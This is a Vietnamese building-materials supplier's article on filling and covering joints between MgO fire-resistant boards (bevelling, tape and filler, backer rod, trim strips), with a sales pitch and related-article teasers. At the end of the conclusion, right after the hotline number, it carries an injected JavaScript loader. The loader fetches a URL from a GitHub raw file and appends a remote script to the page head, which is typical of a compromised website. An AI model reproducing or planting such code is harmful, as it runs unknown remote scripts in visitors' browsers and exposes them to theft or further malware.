Làm thế nào để lấp đầy, che đi các mối nối giữa các tấm MGO

Tấm chống cháy MGO là một loại vật liệu được sử dụng rộng rãi trong các công trình xây dựng, giúp ngăn chặn sự lan truyền của đám cháy. Tuy nhiên, các mối nối giữa các tấm MGO thường là những điểm yếu, có thể khiến nó bị bong tróc, nứt vỡ, ảnh hưởng đến khả năng cách nhiệt, chống cháy của tấm MGO.

Vậy làm thế nào để lấp đầy, che đi các mối nối giữa các tấm MGO, giúp nó vừa đảm bảo khả năng cách nhiệt, chống cháy lại vừa đảm bảo được tính thẩm mỹ? Bài viết dưới đây sẽ cung cấp cho bạn những thông tin cần thiết để giải quyết vấn đề này.

Làm thế nào để lấp đầy, che đi các mối nối giữa các tấm MGO

Tấm chống cháy MGO là gì?

Tấm MGO chống cháy là viết tắt của Magnesium Oxide (Magie Oxide), đây là một loại vật liệu chống cháy. Được sử dụng rộng rãi trong các ứng dụng xây dựng và công nghiệp. Với tính năng kháng lửa rất tốt, MGO chống cháy được sử dụng để che chắn, tách lửa giữa các khu vực. Và để tạo nên các sản phẩm khác như tấm trần chống cháy, tấm cách âm – không cháy, vách ngăn chịu lửa, cốt bê tông kháng lửa. Đặc biệt tấm MGO chống cháy được sử dụng rất nhiều để làm lõi vật liệu chính cho các hệ cửa thép chống cháy hiện nay.

Tấm chống cháy MGO được dùng để làm gì?

Vách ngăn chống cháy: Tấm chống cháy MGO được sử dụng để xây dựng vách ngăn chống cháy giữa các khu vực khác nhau trong một công trình. Với khả năng chịu lửa và chống cháy tốt, vách ngăn chống cháy từ tấm MGO giúp ngăn chặn sự lan truyền của ngọn lửa và khói trong trường hợp xảy ra hỏa hoạn.

Trần chống cháy: Tấm chống cháy MGO cũng được sử dụng để làm trần chống cháy trong các khu vực như hành lang, phòng học, văn phòng,… Trần chống cháy từ tấm MGO giúp ngăn chặn sự lan truyền của lửa và khói giữa các tầng, tạo thời gian đáng kể cho việc sơ tán và cứu hộ trong trường hợp khẩn cấp.

Cửa chống cháy: Tấm chống cháy MGO cũng được sử dụng để làm cửa chống cháy. Các cửa chống cháy từ tấm MGO có khả năng chịu lửa và chống cháy cao, giúp ngăn chặn sự lan truyền của ngọn lửa và khói qua cửa, bảo vệ khu vực phía sau cửa khỏi nguy cơ cháy nổ.

Cách lấp đầy và che đi các mối nối giữa các tấm MGO

Đầu tiên, bạn có thể mài vát mép chỗ mối nối để tránh độ cao khác nhau giữa các tấm MGO. Sau đó thi công giống như với tấm thạch cao bằng cách dùng băng dính để tránh nứt dăm và bột bả chuyên dụng để lấp đầy các mối nối. Bột bả thạch cao sẽ liên kết các tấm MGO lại với nhau. Tuy nhiên, bạn không nên sử dụng các loại bột bả đã trộn sẵn có trọng lượng nhẹ bán trên thị trường. Sau đó là chà nhám cho phẳng, nhẵn.

Để xử lý các vết nứt dăm bạn có thể sử dụng xốp chèn khe co giãn. Điều này đòi hỏi phải tạo ra một khoảng cách rộng từ 3 đến 6mm giữa các tấm MGO. Trong đó, độ sâu của khe hở được kiểm soát bằng cách sử dụng xốp chống thấm Polyetylen chèn khe co giãn sao cho đường kính xốp lớn hơn chiều sâu mối nối. Sơn 1 lớp sơn lót và phủ một lớp sơn chính khi đóng rắn. Sau đó mới dùng băng dính và bột bả chuyên dụng để thi công.

Hoặc có thể dùng vật liệu trang trí để dán lên bề mặt tấm MGO nhằm che đi các mối nối. Cũng có thể che các mối nối bằng các loại chỉ nẹp chuyên dụng bằng kim loại nhôm hoặc nhựa đúc.

Địa chỉ cung cấp tấm chống cháy MGO uy tín tại Nha Trang

Vatlieuxaydunguytin là một địa chỉ cung cấp tấm chống cháy MGO uy tín tại Nha Trang và các khu vực lân cận. Với nhiều năm kinh nghiệm trong ngành vật liệu xây dựng, chúng tôi cam kết cung cấp sản phẩm chất lượng và đáng tin cậy cho khách hàng.

Tấm chống cháy MGO là một sản phẩm được sử dụng phổ biến trong ngành xây dựng, đặc biệt là trong các công trình yêu cầu độ an toàn cao. Tấm chống cháy MGO đảm bảo an toàn phòng cháy chữa cháy cho các công trình xây dựng.

Tại Vatlieuxaydunguytin, chúng tôi cung cấp tấm chống cháy MGO với các tiêu chuẩn chất lượng cao, cam kết mang đến cho khách hàng những sản phẩm chất lượng và tuổi thọ cao.
Ngoài ra, chúng tôi luôn đặt sự hài lòng của khách hàng lên hàng đầu. Đội ngũ nhân viên am hiểu về sản phẩm và luôn sẵn sàng tư vấn, hỗ trợ giúp khách hàng có được giải pháp phù hợp với nhu cầu cụ thể của mình.

Kết luận

Lấp đầy và che đi các mối nối giữa các tấm MGO là việc làm cần thiết để đảm bảo sự hoàn thiện và an toàn cho công trình xây dựng của bạn. Hãy liên hệ với chúng tôi qua hotline 0983 545 455 để được tư vấn và báo giá ngay hôm nay. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Bài viết liên quan

Bí quyết chọn mua khóa tay gạt cửa thép chất lượng cao

Bí quyết chọn mua khóa tay gạt cửa thép chất lượng cao

Trong quá trình hoàn thiện và nâng cấp ngôi nhà, việc chọn mua khóa tay gạt cửa thép chất lượng cao là một yếu tố quan trọng đảm bảo an ninh, thẩm mỹ và sự tiện lợi cho không gian sống. Khóa tay gạt không chỉ là một chi tiết nhỏ, mà còn đóng vai […]

Lợi ích sử dụng bông khoáng trong cách nhiệt mái nhà

Lợi ích sử dụng bông khoáng trong cách nhiệt mái nhà

Trong quá trình xây dựng và cải tạo nhà ở, việc lựa chọn vật liệu cách nhiệt cho mái nhà đóng vai trò vô cùng quan trọng. Đặc biệt tại những khu vực có khí hậu nóng ẩm hoặc lạnh giá, cách nhiệt không chỉ giúp duy trì sự thoải mái trong không gian sống […]

Cách lắp đặt bản lề sàn cho cửa nhôm kính đúng chuẩn

Cách lắp đặt bản lề sàn cho cửa nhôm kính đúng chuẩn

Cửa nhôm kính là một trong những lựa chọn phổ biến cho các công trình hiện đại bởi tính thẩm mỹ cao, khả năng cách âm và cách nhiệt tốt. Để đảm bảo cửa nhôm kính hoạt động hiệu quả và bền bỉ, việc lắp đặt bản lề sàn đúng chuẩn là vô cùng quan […]

Làm thế nào để chọn phụ kiện cửa nhôm phù hợp với các loại cửa?

Làm thế nào để chọn phụ kiện cửa nhôm phù hợp với các loại cửa?

Khi thiết kế hoặc cải tạo không gian sống, việc lựa chọn phụ kiện cửa nhôm phù hợp không chỉ là vấn đề về thẩm mỹ mà còn ảnh hưởng trực tiếp đến tính năng và hiệu quả sử dụng của cửa. Phụ kiện cửa nhôm bao gồm nhiều thành phần như bản lề, khóa, […]

Cách chọn tay co thủy lực phù hợp với mỗi loại cửa

Cách chọn tay co thủy lực phù hợp với mỗi loại cửa

Tay co thủy lực hay còn gọi là tay đẩy hơi, là một phụ kiện quan trọng trong việc đảm bảo an toàn và sự tiện lợi cho các loại cửa trong công trình xây dựng hiện đại. Không chỉ giúp cửa tự động đóng lại sau khi mở, tay co thủy lực còn có […]

Vật liệu chống cháy: Giải pháp tiết kiệm chi phí dài hạn

Vật liệu chống cháy: Giải pháp tiết kiệm chi phí dài hạn

Trong bối cảnh hiện đại, sự an toàn của con người và tài sản là yếu tố được đặt lên hàng đầu trong bất kỳ công trình xây dựng nào. Để đảm bảo tính mạng và tài sản trước nguy cơ cháy nổ, việc sử dụng các vật liệu chống cháy trong xây dựng không […]